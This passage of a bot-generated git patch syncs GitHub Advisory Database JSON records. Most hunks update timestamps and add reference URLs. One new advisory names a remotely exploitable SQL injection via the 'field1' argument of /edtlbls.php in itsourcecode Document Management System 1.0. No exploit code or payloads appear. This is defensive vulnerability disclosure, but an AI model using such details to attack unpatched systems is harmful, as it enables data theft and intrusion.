"database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json b/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json new file mode 100644 index 0000000000000..5a105f235bead --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgpr-jxrq-2m57", + "modified": "2026-02-24T06:31:30Z", + "published": "2026-02-24T06:31:30Z", + "aliases": [ + "CVE-2026-3069" + ], + "details": "A security vulnerability has been detected in itsourcecode Document Management System 1.0. Affected is an unknown function of the file /edtlbls.php. The manipulation of the argument field1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3069" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/cve_submit/issues/5" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347424" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347424" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757746" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T05:17:18Z" + } +} \ No newline at end of file From 19beec907b8e1b8490e0b828ba7109cc356d5dd1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 09:32:31 +0000 Subject: [PATCH 75/77] Advisory Database Sync --- .../GHSA-g7xr-56w3-vjqh.json | 6 ++- .../GHSA-284q-85q8-xhhq.json | 6 ++- .../GHSA-72q5-998j-vg7r.json | 6 ++- .../GHSA-87xj-ghmc-c3xq.json | 6 ++- .../GHSA-cfvm-7f4p-fg84.json | 6 ++- .../GHSA-fjfr-qh36-wf3q.json | 6 ++- .../GHSA-fw46-27g2-vm4h.json | 6 ++- .../GHSA-fwc5-xhrg-wx5f.json | 6 ++- .../GHSA-w337-wphv-g4vh.json | 6 ++- .../GHSA-wmcg-whfp-429v.json | 6 ++- .../GHSA-462x-7r4x-p5hx.json | 6 ++- .../GHSA-5pqw-p5hq-5f98.json | 6 ++- .../GHSA-6764-r2xh-qmhg.json | 10 ++++- .../GHSA-69hw-6qrh-77rw.json | 6 ++- .../GHSA-9m86-pmxw-268g.json | 6 ++- .../GHSA-c9jg-5vh8-ff2v.json | 6 ++- .../GHSA-j383-q79v-268x.json | 6 ++- .../GHSA-mfg3-2r9j-5hv9.json | 6 ++- .../GHSA-q269-xqww-45mm.json | 6 ++- .../GHSA-q53m-jpj6-g58x.json | 6 ++- .../GHSA-vwmr-4hph-3f4r.json | 6 ++- .../GHSA-229x-w52j-6f5m.json | 6 ++- .../GHSA-9492-pwhm-prgg.json | 6 ++- .../GHSA-f342-w736-j52r.json | 6 ++- .../GHSA-hg49-2rqm-p9hf.json | 6 ++- .../GHSA-w2jm-qqhw-c9px.json | 6 ++- .../GHSA-w944-w7q2-5fv6.json | 6 ++- .../GHSA-xh4m-g9pq-wh25.json | 6 ++- .../GHSA-8cmg-xf32-xmvr.json | 40 +++++++++++++++++++ .../GHSA-hwvv-m8xc-26x2.json | 36 +++++++++++++++++ .../GHSA-jjx5-vcwr-cwfq.json | 40 +++++++++++++++++++ .../GHSA-p4xj-mrqw-g3f3.json | 36 +++++++++++++++++ .../GHSA-vh45-gfxf-vr42.json | 40 +++++++++++++++++++ .../GHSA-x366-cwf7-x9gv.json | 40 +++++++++++++++++++ 34 files changed, 376 insertions(+), 28 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json diff --git a/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json b/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json index 677695f32494d..887d472f48274 100644 --- a/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json +++ b/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g7xr-56w3-vjqh", - "modified": "2022-04-30T18:09:55Z", + "modified": "2026-02-24T09:31:12Z", "published": "2022-04-30T18:09:55Z", "aliases": [ "CVE-1999-0073" @@ -17,6 +17,10 @@ { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0073" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/24/3" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json b/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json index bb11611d2e65b..2b87b9fa9f019 100644 --- a/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json +++ b/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-284q-85q8-xhhq", - "modified": "2025-10-08T15:32:27Z", + "modified": "2026-02-24T09:31:13Z", "published": "2025-10-08T15:32:27Z", "aliases": [ "CVE-2025-11475" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.667107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.703085" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json b/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json index 668acb23ec59b..1bce62ee6a2b4 100644 --- a/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json +++ b/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-72q5-998j-vg7r", - "modified": "2025-10-27T09:30:15Z", + "modified": "2026-02-24T09:31:14Z", "published": "2025-10-27T09:30:15Z", "aliases": [ "CVE-2025-12236" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.673724" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.721455" + }, { "type": "WEB", "url": "https://www.tenda.com.cn" diff --git a/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json b/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json index 4028ec925e70f..d126b89857fdf 100644 --- a/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json +++ b/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-87xj-ghmc-c3xq", - "modified": "2025-10-10T18:31:24Z", + "modified": "2026-02-24T09:31:14Z", "published": "2025-10-10T18:31:23Z", "aliases": [ "CVE-2025-11580" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/PowerJob/PowerJob/issues/1127" }, + { + "type": "WEB", + "url": "https://github.com/PowerJob/PowerJob" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.327902" diff --git a/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json b/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json index 8803f579f79f8..72a1b08e0adee 100644 --- a/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json +++ b/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cfvm-7f4p-fg84", - "modified": "2025-10-27T03:30:39Z", + "modified": "2026-02-24T09:31:14Z", "published": "2025-10-27T03:30:39Z", "aliases": [ "CVE-2025-12203" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/givanz/Vvveb/commit/b0fa7ff74a3539c6d37000db152caad572e4c39b" }, + { + "type": "WEB", + "url": "https://github.com/givanz/Vvveb" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.329873" diff --git a/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json b/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json index c78d89ee95c37..d04bfc24aa105 100644 --- a/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json +++ b/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fjfr-qh36-wf3q", - "modified": "2025-10-05T12:30:24Z", + "modified": "2026-02-24T09:31:12Z", "published": "2025-10-05T12:30:24Z", "aliases": [ "CVE-2025-11289" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.659789" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.709804" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json b/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json index 168de496ab90e..15b818de18bbb 100644 --- a/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json +++ b/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fw46-27g2-vm4h", - "modified": "2025-10-07T12:31:16Z", + "modified": "2026-02-24T09:31:13Z", "published": "2025-10-07T12:31:16Z", "aliases": [ "CVE-2025-11390" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.664984" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.665028" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json b/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json index 633fc0e3bfb99..7fbb20d912b4e 100644 --- a/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json +++ b/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fwc5-xhrg-wx5f", - "modified": "2025-10-27T15:30:42Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-10-27T15:30:42Z", "aliases": [ "CVE-2025-12286" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.672512" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.682569" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json b/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json index aa90040aff914..0af14cd38869c 100644 --- a/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json +++ b/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w337-wphv-g4vh", - "modified": "2025-10-08T00:31:08Z", + "modified": "2026-02-24T09:31:13Z", "published": "2025-10-08T00:31:07Z", "aliases": [ "CVE-2025-11413" @@ -51,6 +51,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.665587" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.665590" + }, { "type": "WEB", "url": "https://www.gnu.org" diff --git a/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json b/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json index 4e5791c6040d0..efcd3af046fae 100644 --- a/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json +++ b/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wmcg-whfp-429v", - "modified": "2025-10-19T21:30:24Z", + "modified": "2026-02-24T09:31:14Z", "published": "2025-10-19T21:30:24Z", "aliases": [ "CVE-2025-11944" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/givanz/Vvveb/commit/52204b4a106b2fb02d16eee06a88a1f2697f9b35" }, + { + "type": "WEB", + "url": "https://github.com/givanz/Vvveb" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.329024" diff --git a/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json b/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json index d65afe658a332..e203fa7433472 100644 --- a/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json +++ b/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-462x-7r4x-p5hx", - "modified": "2025-11-16T03:30:25Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-16T03:30:25Z", "aliases": [ "CVE-2025-13232" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/projectsend/projectsend/commit/334da1ea39cb12f6b6e98dd2f80bb033e0c7b845" }, + { + "type": "WEB", + "url": "https://github.com/projectsend/projectsend" + }, { "type": "WEB", "url": "https://github.com/projectsend/projectsend/releases/tag/r1945" diff --git a/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json b/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json index 5b2aa02ae0994..c4d349034cc63 100644 --- a/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json +++ b/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqw-p5hq-5f98", - "modified": "2025-11-12T21:31:08Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-12T21:31:08Z", "aliases": [ "CVE-2025-13058" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/soerennb/extplorer/commit/002def70b985f7012586df2c44368845bf405ab3" }, + { + "type": "WEB", + "url": "https://github.com/soerennb/extplorer" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.332185" diff --git a/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json b/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json index b18300ea89a07..a0cb546b9ccef 100644 --- a/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json +++ b/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6764-r2xh-qmhg", - "modified": "2025-11-14T18:31:39Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-14T18:31:39Z", "aliases": [ "CVE-2025-13170" @@ -42,6 +42,14 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.684617" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.685870" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.698602" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json b/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json index c15f17511183a..0f540cf4087e2 100644 --- a/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json +++ b/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-69hw-6qrh-77rw", - "modified": "2025-11-17T06:30:14Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-17T06:30:14Z", "aliases": [ "CVE-2025-13260" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.689268" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.724933" + }, { "type": "WEB", "url": "https://www.campcodes.com" diff --git a/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json b/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json index 51bbf70cd773e..579d339735ec7 100644 --- a/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json +++ b/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9m86-pmxw-268g", - "modified": "2025-11-07T18:30:30Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-07T18:30:30Z", "aliases": [ "CVE-2025-12862" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.679802" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.748850" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json b/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json index 2ba15752b5a88..61c5a9c5a290c 100644 --- a/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json +++ b/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c9jg-5vh8-ff2v", - "modified": "2025-11-10T03:30:16Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-10T03:30:15Z", "aliases": [ "CVE-2025-12925" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/rymcu/forest/issues/199" }, + { + "type": "WEB", + "url": "https://github.com/rymcu/forest" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331645" diff --git a/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json b/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json index 527f9fbb3d18f..2293dd921e9cc 100644 --- a/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json +++ b/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j383-q79v-268x", - "modified": "2025-11-13T18:31:04Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-13T18:31:04Z", "aliases": [ "CVE-2025-13120" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/mruby/mruby/commit/eb398971bfb43c38db3e04528b68ac9a7ce509bc" }, + { + "type": "WEB", + "url": "https://github.com/mruby/mruby" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.332325" diff --git a/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json b/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json index 737c23b11b9eb..0e0d86bc0f4a1 100644 --- a/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json +++ b/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mfg3-2r9j-5hv9", - "modified": "2025-11-10T03:30:15Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-10T03:30:15Z", "aliases": [ "CVE-2025-12924" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/rymcu/forest/issues/198" }, + { + "type": "WEB", + "url": "https://github.com/rymcu/forest" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331644" diff --git a/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json b/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json index e24cf02c3bad4..99198bc01e8f0 100644 --- a/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json +++ b/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q269-xqww-45mm", - "modified": "2025-11-07T21:31:21Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-07T21:31:21Z", "aliases": [ "CVE-2025-12875" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/makesoftwaresafe/mruby/commit/93619f06dd378db6766666b30c08978311c7ec94" }, + { + "type": "WEB", + "url": "https://github.com/mruby/mruby" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331511" diff --git a/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json b/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json index 6504a44093a3f..a043e43fa5562 100644 --- a/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json +++ b/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q53m-jpj6-g58x", - "modified": "2025-11-17T03:30:26Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-17T03:30:26Z", "aliases": [ "CVE-2025-13259" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.688780" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.715808" + }, { "type": "WEB", "url": "https://www.campcodes.com" diff --git a/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json b/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json index 1e06739e85406..b8c4d3240cbb0 100644 --- a/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json +++ b/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vwmr-4hph-3f4r", - "modified": "2025-11-03T03:30:25Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-03T03:30:25Z", "aliases": [ "CVE-2025-12610" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.678450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.683064" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json b/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json index 7e91138064abd..c7e07d1d858ce 100644 --- a/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json +++ b/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-229x-w52j-6f5m", - "modified": "2025-12-29T09:30:23Z", + "modified": "2026-02-24T09:31:19Z", "published": "2025-12-29T09:30:23Z", "aliases": [ "CVE-2025-15176" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/b72d8349980076e2c033c8324f07747a86eea4f8" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338561" diff --git a/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json b/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json index 87c2cb0100087..d00a14c4b06fe 100644 --- a/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json +++ b/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9492-pwhm-prgg", - "modified": "2025-12-26T03:30:14Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-26T03:30:14Z", "aliases": [ "CVE-2025-15093" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/sunkaifei/FlyCms/issues/15" }, + { + "type": "WEB", + "url": "https://github.com/sunkaifei/FlyCms" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338422" diff --git a/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json b/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json index 9f47a641eb028..b73f00c219360 100644 --- a/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json +++ b/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f342-w736-j52r", - "modified": "2025-12-27T21:30:12Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-27T21:30:12Z", "aliases": [ "CVE-2025-15109" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15109" }, + { + "type": "WEB", + "url": "https://gitee.com/jackq/XCMS" + }, { "type": "WEB", "url": "https://gitee.com/jackq/XCMS/issues/IDC4ZT" diff --git a/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json b/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json index 1a7f118308cb6..6ba526ac666bd 100644 --- a/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json +++ b/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg49-2rqm-p9hf", - "modified": "2025-12-26T03:30:15Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-26T03:30:15Z", "aliases": [ "CVE-2025-15094" @@ -27,6 +27,10 